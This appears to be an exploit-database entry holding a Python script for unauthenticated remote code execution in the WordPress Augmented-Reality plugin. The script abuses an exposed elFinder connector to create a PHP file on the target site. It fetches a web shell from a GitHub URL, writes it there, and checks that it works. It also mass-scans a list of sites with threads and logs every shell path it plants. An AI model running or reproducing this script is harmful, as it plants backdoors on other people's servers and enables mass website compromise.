Share
## https://sploitus.com/exploit?id=EDB-ID:51788
# Exploit Title: Wordpress Augmented-Reality - Remote Code Execution Unauthenticated
# Date: 2023-09-20
# Author: Milad Karimi (Ex3ptionaL)
# Category : webapps
# Tested on: windows 10 , firefox

import requests as req
import json
import sys
import random
import uuid
import urllib.parse
import urllib3
from multiprocessing.dummy import Pool as ThreadPool
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
filename="{}.php".format(str(uuid.uuid4())[:8])
proxies = {}
#proxies = {
#  'http': 'http://127.0.0.1:8080',
#  'https': 'http://127.0.0.1:8080',
#}
phash = "l1_Lw"
r=req.Session()
user_agent={
"User-Agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
}
r.headers.update(user_agent)
def is_json(myjson):
  try:
    json_object = json.loads(myjson)
  except ValueError as e:
    return False
  return True
def mkfile(target):
    data={"cmd" : "mkfile", "target":phash, "name":filename}
    resp=r.post(target, data=data)
    respon = resp.text
    if resp.status_code == 200 and is_json(respon):
        resp_json=respon.replace(r"\/", "").replace("\\", "")
        resp_json=json.loads(resp_json)
        return resp_json["added"][0]["hash"]
    else:
        return False
def put(target, hash):
    content=req.get("https://raw.githubusercontent.com/0x5a455553/MARIJUANA/master/MARIJUANA.php", proxies=proxies, verify=False)
    content=content.text
    data={"cmd" : "put", "target":hash, "content": content}
    respon=r.post(target, data=data, proxies=proxies, verify=False)
    if respon.status_code == 200:
      return True
def exploit(target):
    try:
        vuln_path = "{}/wp-content/plugins/augmented-reality/vendor/elfinder/php/connector.minimal.php".format(target)
        respon=r.get(vuln_path, proxies=proxies, verify=False).status_code
        if respon != 200:
          print("[FAIL] {}".format(target))
          return
        hash=mkfile(vuln_path)
        if hash == False:
          print("[FAIL] {}".format(target))
          return
        if put(vuln_path, hash):
          shell_path = "{}/wp-content/plugins/augmented-reality/file_manager/{}".format(target,filename)
          status = r.get(shell_path, proxies=proxies, verify=False).status_code
          if status==200 :
              with open("result.txt", "a") as newline:
                  newline.write("{}\n".format(shell_path))
                  newline.close()
              print("[OK] {}".format(shell_path))
              return
          else:
              print("[FAIL] {}".format(target))
              return
        else:
          print("[FAIL] {}".format(target))
          return
    except req.exceptions.SSLError:
          print("[FAIL] {}".format(target))
          return
    except req.exceptions.ConnectionError:
          print("[FAIL] {}".format(target))
          return
def main():
    threads = input("[?] Threads > ")
    list_file = input("[?] List websites file > ")
    print("[!] all result saved in result.txt")
    with open(list_file, "r") as file:
        lines = [line.rstrip() for line in file]
        th = ThreadPool(int(threads))
        th.map(exploit, lines)
if __name__ == "__main__":
    main()